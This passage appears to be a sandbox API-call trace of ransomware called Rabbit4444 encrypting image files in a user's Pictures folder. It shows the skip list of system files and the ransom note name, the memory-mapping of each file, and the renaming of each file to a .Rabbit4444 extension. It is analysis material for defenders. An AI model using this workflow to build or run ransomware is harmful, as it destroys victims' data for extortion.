hHeap=0xe0000) returned 1 [0048.740] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0x108ab0 | out: hHeap=0xe0000) returned 1 [0048.740] QueryPerformanceCounter (in: lpPerformanceCount=0x130bfc8 | out: lpPerformanceCount=0x130bfc8*=14005070941) returned 1 [0048.740] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0x117680 | out: hHeap=0xe0000) returned 1 [0048.740] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0x101958 | out: hHeap=0xe0000) returned 1 [0048.740] UnmapViewOfFile (lpBaseAddress=0x70000) returned 1 [0048.741] CloseHandle (hObject=0x298) returned 1 [0048.741] CloseHandle (hObject=0x278) returned 1 [0048.742] wsprintfW (in: param_1=0x130c2c8, param_2="%s.%s" | out: param_1="C:\\Users\\FD1HVy\\Pictures\\HQIARmS0E7.jpg.Rabbit4444") returned 50 [0048.742] MoveFileExW (lpExistingFileName="C:\\Users\\FD1HVy\\Pictures\\HQIARmS0E7.jpg" (normalized: "c:\\users\\fd1hvy\\pictures\\hqiarms0e7.jpg"), lpNewFileName="C:\\Users\\FD1HVy\\Pictures\\HQIARmS0E7.jpg.Rabbit4444" (normalized: "c:\\users\\fd1hvy\\pictures\\hqiarms0e7.jpg.rabbit4444"), dwFlags=0x1) returned 1 [0048.743] InterlockedExchangeAdd (in: Addend=0xff618, Value=47344 | out: Addend=0xff618) returned 17966016 [0048.743] InterlockedExchangeAdd (in: Addend=0xff624, Value=1 | out: Addend=0xff624) returned 3414 [0048.743] FindNextFileW (in: hFindFile=0x1025d0, lpFindFileData=0x130dfe8 | out: lpFindFileData=0x130dfe8*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xdc2a1670, ftCreationTime.dwHighDateTime=0x1d4c941, ftLastAccessTime.dwLowDateTime=0x32c51dc0, ftLastAccessTime.dwHighDateTime=0x1d4cfbb, ftLastWriteTime.dwLowDateTime=0x32c51dc0, ftLastWriteTime.dwHighDateTime=0x1d4cfbb, nFileSizeHigh=0x0, nFileSizeLow=0x6670, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="iOQr98FaIzfNvYuwjB9.jpg", cAlternateFileName="IOQR98~1.JPG")) returned 1 [0048.743] lstrcmpiW (lpString1="iOQr98FaIzfNvYuwjB9.jpg", lpString2="HOW TO BACK YOUR FILES.txt") returned 1 [0048.743] lstrcmpiW (lpString1="iOQr98FaIzfNvYuwjB9.jpg", lpString2=".BFC0E91B00AE8A0620D3") returned 1 [0048.743] lstrcmpiW (lpString1="iOQr98FaIzfNvYuwjB9.jpg", lpString2="Rabbit4444.exe") returned -1 [0048.743] lstrcmpiW (lpString1="iOQr98FaIzfNvYuwjB9.jpg", lpString2=".") returned 1 [0048.743] lstrcmpiW (lpString1="iOQr98FaIzfNvYuwjB9.jpg", lpString2="..") returned 1 [0048.743] lstrcmpiW (lpString1="iOQr98FaIzfNvYuwjB9.jpg", lpString2="windows") returned -1 [0048.743] lstrcmpiW (lpString1="iOQr98FaIzfNvYuwjB9.jpg", lpString2="bootmgr") returned 1 [0048.743] lstrcmpiW (lpString1="iOQr98FaIzfNvYuwjB9.jpg", lpString2="pagefile.sys") returned -1 [0048.743] lstrcmpiW (lpString1="iOQr98FaIzfNvYuwjB9.jpg", lpString2="boot") returned 1 [0048.743] lstrcmpiW (lpString1="iOQr98FaIzfNvYuwjB9.jpg", lpString2="ids.txt") returned 1 [0048.743] lstrcmpiW (lpString1="iOQr98FaIzfNvYuwjB9.jpg", lpString2="NTUSER.DAT") returned -1 [0048.743] lstrcpyW (in: lpString1=0x130eb6a, lpString2="iOQr98FaIzfNvYuwjB9.jpg" | out: lpString1="iOQr98FaIzfNvYuwjB9.jpg") returned="iOQr98FaIzfNvYuwjB9.jpg" [0048.743] SetFileAttributesW (lpFileName="C:\\Users\\FD1HVy\\Pictures\\iOQr98FaIzfNvYuwjB9.jpg", dwFileAttributes=0x0) returned 1 [0048.744] lstrlenW (lpString="iOQr98FaIzfNvYuwjB9.jpg") returned 23 [0048.744] lstrlenW (lpString="Rabbit4444") returned 10 [0048.744] lstrcmpiW (lpString1="YuwjB9.jpg", lpString2="Rabbit4444") returned 1 [0048.744] lstrlenW (lpString=".dll") returned 4 [0048.744] lstrcmpiW (lpString1=".jpg", lpString2=".dll") returned 1 [0048.744] lstrlenW (lpString=".lnk") returned 4 [0048.744] lstrcmpiW (lpString1=".jpg", lpString2=".lnk") returned -1 [0048.744] lstrlenW (lpString=".ini") returned 4 [0048.744] lstrcmpiW (lpString1=".jpg", lpString2=".ini") returned 1 [0048.744] lstrlenW (lpString=".sys") returned 4 [0048.744] lstrcmpiW (lpString1=".jpg", lpString2=".sys") returned -1 [0048.744] CreateFileW (lpFileName="C:\\Users\\FD1HVy\\Pictures\\iOQr98FaIzfNvYuwjB9.jpg" (normalized: "c:\\users\\fd1hvy\\pictures\\ioqr98faizfnvyuwjb9.jpg"), dwDesiredAccess=0xe0003, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x8a000000, hTemplateFile=0x0) returned 0x278 [0048.744] QueryPerformanceFrequency (in: lpFrequency=0x130bfb8 | out: lpFrequency=0x130bfb8*=100000000) returned 1 [0048.744] QueryPerformanceCounter (in: lpPerformanceCount=0x130bfc0 | out: lpPerformanceCount=0x130bfc0*=14005478728) returned 1 [0048.744] GetFileSizeEx (in: hFile=0x278, lpFileSize=0x130c018 | out: lpFileSize=0x130c018*=26224) returned 1 [0048.744] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0x6c) returned 0x117b30 [0048.744] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0x80) returned 0x101d98 [0048.744] CreateFileMappingW (hFile=0x278, lpFileMappingAttributes=0x0, flProtect=0x4, dwMaximumSizeHigh=0x0, dwMaximumSizeLow=0x6970, lpName=0x0) returned 0x298 [0048.744] MapViewOfFile (hFileMappingObject=0x298, dwDesiredAccess=0x6, dwFileOffsetHigh=0x0, dwFileOffsetLow=0x0, dwNumberOfBytesToMap=0x6970) returned 0x70000 [0048.745] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0x100) returned 0xf12e0 [0048.745] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0x104) returned 0x109488 [0048.745] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0xf12e0 | out: hHeap=0xe0000) returned 1 [0048.745] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0x104) returned 0x108f10 [0048.745] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0x208) returned 0x10c928 [0048.746] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0x108f10 | out: hHeap=0xe0000) returned 1 [0048.746] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0x10c928 | out: hHeap=0xe0000) returned 1 [0048.746] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0x109488 | out: hHeap=0xe0000) returned 1 [0048.746] QueryPerformanceCounter (in: lpPerformanceCount=0x130bfc8 | out: lpPerformanceCount=0x130bfc8*=14005638062) returned 1 [0048.746] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0x117b30 | out: hHeap=0xe0000) returned 1 [0048.746] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0x101d98 | out: hHeap=0xe0000) returned 1 [0048.746] UnmapViewOfFile (lpBaseAddress=0x70000) returned 1 [0048.746] CloseHandle (hObject=0x298) returned 1 [0048.746] CloseHandle (hObject=0x278) returned 1 [0048.755] wsprintfW (in: param_1=0x130c2c8, param_2="%s.%s" | out: param_1="C:\\Users\\FD1HVy\\Pictures\\iOQr98FaIzfNvYuwjB9.jpg.Rabbit4444") returned 59 [0048.755] MoveFileExW (lpExistingFileName="C:\\Users\\FD1HVy\\Pictures\\iOQr98FaIzfNvYuwjB9.jpg" (normalized: "c:\\users\\fd1hvy\\pictures\\ioqr98faizfnvyuwjb9.jpg"), lpNewFileName="C:\\Users\\FD1HVy\\Pictures\\iOQr98FaIzfNvYuwjB9.jpg.Rabbit4444" (normalized: "c:\\users\\fd1hvy\\pictures\\ioqr98faizfnvyuwjb9.jpg.rabbit4444"), dwFlags=0x1) returned 1 [0048.756] InterlockedExchangeAdd (in: Addend=0xff618, Value=26224 | out: Addend=0xff618) returned 18013360 [0048.756] InterlockedExchangeAdd (in: Addend=0xff624, Value=1 | out: Addend=0xff624) returned 3415 [0048.756] FindNextFileW (in: hFindFile=0x1025d0, lpFindFileData=0x130dfe8 | out: lpFindFileData=0x130dfe8*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xbf6a4200, ftCreationTime.dwHighDateTime=0x1d4c85e, ftLastAccessTime.dwLowDateTime=0x51ce3c30, ftLastAccessTime.dwHighDateTime=0x1d4c6a9, ftLastWriteTime.dwLowDateTime=0x51ce3c30, ftLastWriteTime.dwHighDateTime=0x1d4c6a9, nFileSizeHigh=0x0, nFileSizeLow=0x7117, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="Ir5ZI.bmp", cAlternateFileName="")) returned 1 [0048.756] lstrcmpiW (lpString1="Ir5ZI.bmp", lpString2="HOW TO BACK YOUR FILES.txt") returned 1 [0048.756] lstrcmpiW (lpString1="Ir5ZI.bmp", lpString2=".BFC0E91B00AE8A0620D3") returned 1 [0048.756] lstrcmpiW (lpString1="Ir5ZI.bmp", lpString2="Rabbit4444.exe") returned -1 [0048.756] lstrcmpiW (lpString1="Ir5ZI.bmp", lpString2=".") returned 1 [0048.756] lstrcmpiW (lpString1="Ir5ZI.bmp", lpString2="..") returned 1 [0048.756] lstrcmpiW (lpString1="Ir5ZI.bmp", lpString2="windows") returned -1 [0048.756] lstrcmpiW (lpString1="Ir5ZI.bmp", lpString2="bootmgr") returned 1 [0048.756] lstrcmpiW (lpString1="Ir5ZI.bmp", lpString2="pagefile.sys") returned -1 [0048.756] lstrcmpiW (lpString1="Ir5ZI.bmp", lpString2="boot") returned 1 [0048.756] lstrcmpiW (lpString1="Ir5ZI.bmp", lpString2="ids.txt") returned 1 [0048.756] lstrcmpiW (lpString1="Ir5ZI.bmp", lpString2="NTUSER.DAT") returned -1 [0048.756] lstrcpyW (in: lpString1=0x130eb6a, lpString2="Ir5ZI.bmp" | out: lpString1="Ir5ZI.bmp") returned="Ir5ZI.bmp" [0048.756] SetFileAttributesW (lpFileName="C:\\Users\\FD1HVy\\Pictures\\Ir5ZI.bmp", dwFileAttributes=0x0) returned 1 [0048.756] lstrlenW (lpString="Ir5ZI.bmp") returned 9 [0048.756] lstrlenW (lpString="Rabbit4444") returned 10 [0048.756] lstrcmpiW (lpString1="", lpString2="Rabbit4444") returned -1 [0048.756] lstrlenW (lpString=".dll") returned 4 [0048.756] lstrcmpiW (lpString1=".bmp", lpString2=".dll") returned -1 [0048.756] lstrlenW (lpString=".lnk") returned 4 [0048.756] lstrcmpiW (lpString1=".bmp", lpString2=".lnk") returned -1 [0048.756] lstrlenW (lpString=".ini") returned 4 [0048.756] lstrcmpiW (lpString1=".bmp", lpString2=".ini") returned -1 [0048.756] lstrlenW (lpString=".sys") returned 4 [0048.757] lstrcmpiW (lpString1=".bmp", lpString2=".sys") returned -1 [0048.757] CreateFileW (lpFileName="C:\\Users\\FD1HVy\\Pictures\\Ir5ZI.bmp" (normalized: "c:\\users\\fd1hvy\\pictures\\ir5zi.bmp"), dwDesiredAccess=0xe0003, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x8a000000, hTemplateFile=0x0) returned 0x278 [0048.757] QueryPerformanceFrequency (in: lpFrequency=0x130bfb8 | out: lpFrequency=0x130bfb8*=100000000) returned 1 [0048.757] QueryPerformanceCounter (in: lpPerformanceCount=0x130bfc0 | out: lpPerformanceCount=0x130bfc0*=14006744308) returned 1 [0048.757] GetFileSizeEx (in: hFile=0x278, lpFileSize=0x130c018 | out: lpFileSize=0x130c018*=28951) returned 1 [0048.757] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0x6c) returned 0x1178d8 [0048.757] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0x80) returned 0x102150 [0048.757] CreateFileMappingW (hFile=0x278, lpFileMappingAttributes=0x0, flProtect=0x4, dwMaximumSizeHigh=0x0, dwMaximumSizeLow=0x7420, lpName=0x0) returned 0x298 [0048.757] MapViewOfFile (hFileMappingObject=0x298, dwDesiredAccess=0x6, dwFileOffsetHigh=0x0, dwFileOffsetLow=0x0, dwNumberOfBytesToMap=0x7420) returned 0x70000 [0048.758] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0x100) returned 0xf12e0 [0048.758] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0x104) returned 0x108ab0 [0048.758] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0xf12e0 | out: hHeap=0xe0000) returned 1 [0048.758] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0x104) returned 0x1096b8 [0048.758] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0x208) returned 0x10c928 [0048.758] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0x1096b8 | out: hHeap=0xe0000) returned 1 [0048.758] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0x10c928 | out: hHeap=0xe0000) returned 1 [0048.758] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0x108ab0 | out: hHeap=0xe0000) returned 1 [0048.758] QueryPerformanceCounter (in: lpPerformanceCount=0x130bfc8 | out: lpPerformanceCount=0x130bfc8*=14006915611) returned 1 [0048.758] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0x1178d8 | out: hHeap=0xe0000) returned 1 [0048.758] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0x102150 | out: hHeap=0xe0000) returned 1 [0048.759] UnmapViewOfFile (lpBaseAddress=0x70000) returned 1 [0048.759] CloseHandle (hObject=0x298) returned 1 [0048.759] CloseHandle (hObject=0x278) returned 1 [0048.760] wsprintfW (in: param_1=0x130c2c8, param_2="%s.%s" | out: param_1="C:\\Users\\FD1HVy\\Pictures\\Ir5ZI.bmp.Rabbit4444") returned 45 [0048.761] MoveFileExW (lpExistingFileName="C:\\Users\\FD1HVy\\Pictures\\Ir5ZI.bmp" (normalized: "c:\\users\\fd1hvy\\pictures\\ir5zi.bmp"), lpNewFileName="C:\\Users\\FD1HVy\\Pictures\\Ir5ZI.bmp.Rabbit4444" (normalized: "c:\\users\\fd1hvy\\pictures\\ir5zi.bmp.rabbit4444"), dwFlags=0x1) returned 1 [0048.761] InterlockedExchangeAdd (in: Addend=0xff618, Value=28960 | out: Addend=0xff618) returned 18039584 [0048.761] InterlockedExchangeAdd (in: Addend=0xff624, Value=1 | out: Addend=0xff624) returned 3416 [0048.761] FindNextFileW (in: hFindFile=0x1025d0, lpFindFileData=0x130dfe8 | out: lpFindFileData=0x130dfe8*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x707a9d60, ftCreationTime.dwHighDateTime=0x1d4d15b, ftLastAccessTime.dwLowDateTime=0x5ef83e40, ftLastAccessTime.dwHighDateTime=0x1d4c890, ftLastWriteTime.dwLowDateTime=0x5ef83e40, ftLastWriteTime.dwHighDateTime=0x1d4c890, nFileSizeHigh=0x0, nFileSizeLow=0x5ece, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="jpJ811wuLbp.bmp", cAlternateFileName="JPJ811~1.BMP")) returned 1 [0048.761] lstrcmpiW (lpString1="jpJ811wuLbp.bmp", lpString2="HOW TO BACK YOUR FILES.txt") returned 1 [0048.761] lstrcmpiW (lpString1="jpJ811wuLbp.bmp", lpString2=".BFC0E91B00AE8A0620D3") returned 1 [0048.761] lstrcmpiW (lpString1="jpJ811wuLbp.bmp", lpString2="Rabbit4444.exe") returned -1 [0048.761] lstrcmpiW (lpString1="jpJ811wuLbp.bmp", lpString2=".") returned 1 [0048.761] lstrcmpiW (lpString1="jpJ811wuLbp.bmp", lpString2="..") returned 1 [0048.761] lstrcmpiW (lpString1="jpJ811wuLbp.bmp", lpString2="windows") returned -1 [0048.761] lstrcmpiW (lpString1="jpJ811wuLbp.bmp", lpString2="bootmgr") returned 1 [0048.761] lstrcmpiW (lpString1="jpJ811wuLbp.bmp", lpString2="pagefile.sys") returned -1 [0048.761] lstrcmpiW (lpString1="jpJ811wuLbp.bmp", lpString2="boot") returned 1 [0048.761] lstrcmpiW (lpString1="jpJ811wuLbp.bmp", lpString2="ids.txt") returned 1 [0048.761] lstrcmpiW (lpString1="jpJ811wuLbp.bmp", lpString2="NTUSER.DAT") returned -1 [0048.761] lstrcpyW (in: lpString1=0x130eb6a, lpString2="jpJ811wuLbp.bmp" | out: lpString1="jpJ811wuLbp.bmp") returned="jpJ811wuLbp.bmp" [0048.761] SetFileAttributesW (lpFileName="C:\\Users\\FD1HVy\\Pictures\\jpJ811wuLbp.bmp", dwFileAttributes=0x0) returned 1 [0048.762] lstrlenW (lpString="jpJ811wuLbp.bmp") returned 15 [0048.762] lstrlenW (lpString="Rabbit4444") returned 10 [0048.762] lstrcmpiW (lpString1="1wuLbp.bmp", lpString2="Rabbit4444") returned -1 [0048.762] lstrlenW (lpString=".dll") returned 4 [0048.762] lstrcmpiW (lpString1=".bmp", lpString2=".dll") returned -1 [0048.762] lstrlenW (lpString=".lnk") returned 4 [0048.762] lstrcmpiW (lpString1=".bmp", lpString2=".lnk") returned -1 [0048.762] lstrlenW (lpString=".ini") returned 4 [0048.762] lstrcmpiW (lpString1=".bmp", lpString2=".ini") returned -1 [0048.762] lstrlenW (lpString=".sys") returned 4 [0048.762] lstrcmpiW (lpString1=".bmp", lpString2=".sys") returned -1 [0048.762] CreateFileW (lpFileName="C:\\Users\\FD1HVy\\Pictures\\jpJ811wuLbp.bmp" (normalized: "c:\\users\\fd1hvy\\pictures\\jpj811wulbp.bmp"), dwDesiredAccess=0xe0003, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x8a000000, hTemplateFile=0x0) returned 0x278 [0048.762] QueryPerformanceFrequency (in: lpFrequency=0x130bfb8 | out: lpFrequency=0x130bfb8*=100000000) returned 1 [0048.762] QueryPerformanceCounter (in: lpPerformanceCount=0x130bfc0 | out: lpPerformanceCount=0x130bfc0*=14007282751) returned 1 [0048.762] GetFileSizeEx (in: hFile=0x278, lpFileSize=0x130c018 | out: lpFileSize=0x130c018*=24270) returned 1 [0048.762] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0x6c) returned 0x117d10 [0048.762] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0x80) returned 0x101518 [0048.762] CreateFileMappingW (hFile=0x278, lpFileMappingAttributes=0x0, flProtect=0x4, dwMaximumSizeHigh=0x0, dwMaximumSizeLow=0x61d0, lpName=0x0) returned 0x298 [0048.762] MapViewOfFile (hFileMappingObject=0x298, dwDesiredAccess=0x6, dwFileOffsetHigh=0x0, dwFileOffsetLow=0x0, dwNumberOfBytesToMap=0x61d0) returned 0x70000 [0048.764] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0x100) returned 0xf12e0 [0048.764] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0x104) returned 0x1098e8 [0048.764] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0xf12e0 | out: hHeap=0xe0000) returned 1 [0048.764] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0x104) returned 0x108ab0 [0048.764] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0x208) returned 0x10c928 [0048.764] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0x108ab0 | out: hHeap=0xe0000) returned 1 [0048.764] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0x10c928 | out: hHeap=0xe0000) returned 1 [0048.764] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0x1098e8 | out: hHeap=0xe0000) returned 1 [0048.764] QueryPerformanceCounter (in: lpPerformanceCount=0x130bfc8 | out: lpPerformanceCount=0x130bfc8*=14007483344) returned 1 [0048.764] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0x117d10 | out: hHeap=0xe0000) returned 1 [0048.764] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0x101518 | out: hHeap=0xe0000) returned 1 [0048.764] UnmapViewOfFile (lpBaseAddress=0x70000) returned 1 [0048.764] CloseHandle (hObject=0x298) returned 1 [0048.765] CloseHandle (hObject=0x278) returned 1 [0048.766] wsprintfW (in: param_1=0x130c2c8, param_2="%s.%s" | out: param_1="C:\\Users\\FD1HVy\\Pictures\\jpJ811wuLbp.bmp.Rabbit4444") returned 51 [0048.766] MoveFileExW (lpExistingFileName="C:\\Users\\FD1HVy\\Pictures\\jpJ811wuLbp.bmp" (normalized: "c:\\users\\fd1hvy\\pictures\\jpj811wulbp.bmp"), lpNewFileName="C:\\Users\\FD1HVy\\Pictures\\jpJ811wuLbp.bmp.Rabbit4444" (normalized: "c:\\users\\fd1hvy\\pictures\\jpj811wulbp.bmp.rabbit4444"), dwFlags=0x1) returned 1 [0048.767] InterlockedExchangeAdd (in: Addend=0xff618, Value=24272 | out: Addend=0xff618) returned 18068544 [0048.767] InterlockedExchangeAdd (in: Addend=0xff624, Value=2 | out: Addend=0xff624) returned 3417 [0048.767] FindNextFileW (in: hFindFile=0x1025d0, lpFindFileData=0x130dfe8 | out: lpFindFileData=0x130dfe8*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x7dc0e9f0, ftCreationTime.dwHighDateTime=0x1d4d5c7, ftLastAccessTime.dwLowDateTime=0x75d4ae60, ftLastAccessTime.dwHighDateTime=0x1d4d16d, ftLastWriteTime.dwLowDateTime=0x75d4ae60, ftLastWriteTime.dwHighDateTime=0x1d4d16d, nFileSizeHigh=0x0, nFileSizeLow=0xa79d, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="jykDBuh.gif", cAlternateFileName="")) returned 1 [0048.767] lstrcmpiW (lpString1="jykDBuh.gif", lpString2="HOW TO BACK YOUR FILES.txt") returned 1 [0048.767] lstrcmpiW (lpString1="jykDBuh.gif", lpString2=".BFC0E91B00AE8A0620D3") returned 1 [0048.767] lstrcmpiW (lpString1="jykDBuh.gif", lpString2="Rabbit4444.exe") returned -1 [0048.767] lstrcmpiW (lpString1="jykDBuh.gif", lpString2=".") returned 1 [0048.767] lstrcmpiW (lpString1="jykDBuh.gif", lpString2="..") returned 1 [0048.767] lstrcmpiW (lpString1="jykDBuh.gif", lpString2="windows") returned -1 [0048.767] lstrcmpiW (lpString1="jykDBuh.gif", lpString2="bootmgr") returned 1 [0048.767] lstrcmpiW (lpString1="jykDBuh.gif", lpString2="pagefile.sys") returned -1 [0048.767] lstrcmpiW (lpString1="jykDBuh.gif", lpString2="boot") returned 1 [0048.767] lstrcmpiW (lpString1="jykDBuh.gif", lpString2="ids.txt") returned 1 [0048.767] lstrcmpiW (lpString1="jykDBuh.gif", lpString2="NTUSER.DAT") returned -1 [0048.767] lstrcpyW (in: lpString1=0x130eb6a, lpString2="jykDBuh.gif" | out: lpString1="jykDBuh.gif") returned="jykDBuh.gif" [0048.767] SetFileAttributesW (lpFileName="C:\\Users\\FD1HVy\\Pictures\\jykDBuh.gif", dwFileAttributes=0x0) returned 1 [0048.767] lstrlenW (lpString="jykDBuh.gif") returned 11 [0048.767] lstrlenW (lpString="Rabbit4444") returned 10 [0048.767] lstrcmpiW (lpString1="ykDBuh.gif", lpString2="Rabbit4444") returned 1 [0048.767] lstrlenW (lpString=".dll") returned 4 [0048.767] lstrcmpiW (lpString1=".gif", lpString2=".dll") returned 1 [0048.767] lstrlenW (lpString=".lnk") returned 4 [0048.767] lstrcmpiW (lpString1=".gif", lpString2=".lnk") returned -1 [0048.767] lstrlenW (lpString=".ini") returned 4 [0048.768] lstrcmpiW (lpString1=".gif", lpString2=".ini") returned -1 [0048.768] lstrlenW (lpString=".sys") returned 4 [0048.768] lstrcmpiW (lpString1=".gif", lpString2=".sys") returned -1 [0048.768] CreateFileW (lpFileName="C:\\Users\\FD1HVy\\Pictures\\jykDBuh.gif" (normalized: "c:\\users\\fd1hvy\\pictures\\jykdbuh.gif"), dwDesiredAccess=0xe0003, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x8a000000, hTemplateFile=0x0) returned 0x278 [0048.768] QueryPerformanceFrequency (in: lpFrequency=0x130bfb8 | out: lpFrequency=0x130bfb8*=100000000) returned 1 [0048.768] QueryPerformanceCounter (in: lpPerformanceCount=0x130bfc0 | out: lpPerformanceCount=0x130bfc0*=14007848551) returned 1 [0048.768] GetFileSizeEx (in: hFile=0x278, lpFileSize=0x130c018 | out: lpFileSize=0x130c018*=42909) returned 1 [0048.768] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0x6c) returned 0x117680 [0048.768] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0x80) returned 0x102260 [0048.768] CreateFileMappingW (hFile=0x278, lpFileMappingAttributes=0x0, flProtect=0x4, dwMaximumSizeHigh=0x0, dwMaximumSizeLow=0xaaa0, lpName=0x0) returned 0x298 [0048.768] MapViewOfFile (hFileMappingObject=0x298, dwDesiredAccess=0x6, dwFileOffsetHigh=0x0, dwFileOffsetLow=0x0, dwNumberOfBytesToMap=0xaaa0) returned 0x70000 [0048.769] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0x100) returned 0xf12e0 [0048.769] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0x104) returned 0x1097d0 [0048.769] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0xf12e0 | out: hHeap=0xe0000) returned 1 [0048.769] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0x104) returned 0x109488 [0048.769] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0x208) returned 0x10c928 [0048.770] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0x109488 | out: hHeap=0xe0000) returned 1 [0048.770] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0x10c928 | out: hHeap=0xe0000) returned 1 [0048.770] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0x1097d0 | out: hHeap=0xe0000) returned 1 [0048.770] QueryPerformanceCounter (in: lpPerformanceCount=0x130bfc8 | out: lpPerformanceCount=0x130bfc8*=14008042497) returned 1 [0048.770] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0x117680 | out: hHeap=0xe0000) returned 1 [0048.770] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0x102260 | out: hHeap=0xe0000) returned 1 [0048.770] UnmapViewOfFile (lpBaseAddress=0x70000) returned 1 [0048.770] CloseHandle (hObject=0x298) returned 1 [0048.770] CloseHandle (hObject=0x278) returned 1 [0048.772] wsprintfW (in: param_1=0x130c2c8, param_2="%s.%s" | out: param_1="C:\\Users\\FD1HVy\\Pictures\\jykDBuh.gif.Rabbit4444") returned 47 [0048.772] MoveFileExW (lpExistingFileName="C:\\Users\\FD1HVy\\Pictures\\jykDBuh.gif" (normalized: "c:\\users\\fd1hvy\\pictures\\jykdbuh.gif"), lpNewFileName="C:\\Users\\FD1HVy\\Pictures\\jykDBuh.gif.Rabbit4444" (normalized: "c:\\users\\fd1hvy\\pictures\\jykdbuh.gif.rabbit4444"), dwFlags=0x1) returned 1 [0048.773] InterlockedExchangeAdd (in: Addend=0xff618, Value=42912 | out: Addend=0xff618) returned 18092816 [0048.773] InterlockedExchangeAdd (in: Addend=0xff624, Value=1 | out: Addend=0xff624) returned 3419 [0048.773] FindNextFileW (in: hFindFile=0x1025d0, lpFindFileData=0x130dfe8 | out: lpFindFileData=0x130dfe8*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x6745ec70, ftCreationTime.dwHighDateTime=0x1d4cee7, ftLastAccessTime.dwLowDateTime=0x3e50a250, ftLastAccessTime.dwHighDateTime=0x1d4ca60, ftLastWriteTime.dwLowDateTime=0x3e50a250, ftLastWriteTime.dwHighDateTime=0x1d4ca60, nFileSizeHigh=0x0, nFileSizeLow=0x129d, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="mNtSm.gif", cAlternateFileName="")) returned 1 [0048.773] lstrcmpiW (lpString1="mNtSm.gif", lpString2="HOW TO BACK YOUR FILES.txt") returned 1 [0048.773] lstrcmpiW (lpString1="mNtSm.gif", lpString2=".BFC0E91B00AE8A0620D3") returned 1 [0048.773] lstrcmpiW (lpString1="mNtSm.gif", lpString2="Rabbit4444.exe") returned -1 [0048.773] lstrcmpiW (lpString1="mNtSm.gif", lpString2=".") returned 1 [0048.773] lstrcmpiW (lpString1="mNtSm.gif", lpString2="..") returned 1 [0048.773] lstrcmpiW (lpString1="mNtSm.gif", lpString2="windows") returned -1 [0048.773] lstrcmpiW (lpString1="mNtSm.gif", lpString2="bootmgr") returned 1 [0048.773] lstrcmpiW (lpString1="mNtSm.gif", lpString2="pagefile.sys") returned -1 [0048.773] lstrcmpiW (lpString1="mNtSm.gif", lpString2="boot") returned 1 [0048.773] lstrcmpiW (lpString1="mNtSm.gif", lpString2="ids.txt") returned 1 [0048.773] lstrcmpiW (lpString1="mNtSm.gif", lpString2="NTUSER.DAT") returned -1 